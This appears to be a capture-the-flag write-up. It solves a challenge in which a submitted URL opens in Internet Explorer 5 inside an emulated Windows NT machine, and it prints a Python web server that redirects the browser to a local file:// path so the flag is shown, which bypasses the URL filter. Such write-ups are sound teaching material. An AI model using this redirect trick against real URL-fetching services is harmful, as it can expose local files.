Tags: misc 

Rating: 0

We are provided with a URL on which we can submit a URL. This URL is subsequently included in a startup .bat file in a Windows NT virtual machine running with QEMU. The web page also includes some client side obfuscated JavaScript that determines if the URL is valid. Upon submitting a valid URL the VM will start and open up the URL using Internet Explorer 5. Once we submit the URL, the web page cannot be interacted with any longer. This means that we can only view the screen of the VM, but not send mouse or keyboard events to it through the web page. We must therefore ensure that the flag is visible on screen somehow.

The first attempt to solve this challenge is to provide a file URL, like so: `file:///A:/flag.txt`. However this is not considered a valid URL by the filter, as indicated by the error message:
```
ERROR: Illegal URL found, haxor?
```

The VM that is used is also provided for download. We find the startup script that is used to launch Internet Explorer with our URL at `C:\WOW.bat`.

![Batch script](https://i.imgur.com/2vvfcBH.png)

```bat
@echo off
START C:\MSIE50\IEXPLORE.EXE "http://10.0.2.2"
EXIT
```
Our second attempt is to perform command injection in order to open Notepad with the flag after loading a URL. Unfortunately the filter also flags this attempt as an illegal URL like before.

Once we figured out that the VM is able to connect to other IP addresses on the LAN, it became clear that it is possible to make it connect to our machine. We create a simple Python web server that redirects any incoming GET request to the location of the flag.

The server looked as follows:

```python
#This class will handles any incoming request from
#the browser
class myHandler(BaseHTTPRequestHandler):

#Handler for the GET requests
def do_GET(self):
self.send_response(301)
self.send_header('Location','file:///A:/flag.txt')
self.end_headers()
# Send the html message
return

try:
#Create a web server and define the handler to manage the
#incoming request
server = HTTPServer(('', PORT_NUMBER), myHandler)
print 'Started httpserver on port ' , PORT_NUMBER

#Wait forever for incoming htto requests
server.serve_forever()

except KeyboardInterrupt:
print '^C received, shutting down the web server'
server.socket.close()
```

Now we load up the web server and submit our IP-address as the URL. After booting up, the machine sends us a GET request and is redirected as we explained above.

```bash
$ sudo python webserver.py
Started httpserver on port 80
51.15.117.201 - - [09/May/2019 16:34:53] "GET / HTTP/1.0" 301 -
```

The VM starts and opens Internet Explorer 5, which is redirected to the flag on the system.

![Flag](https://i.imgur.com/LKQIJPm.png)

VoilĂ , challenge solved.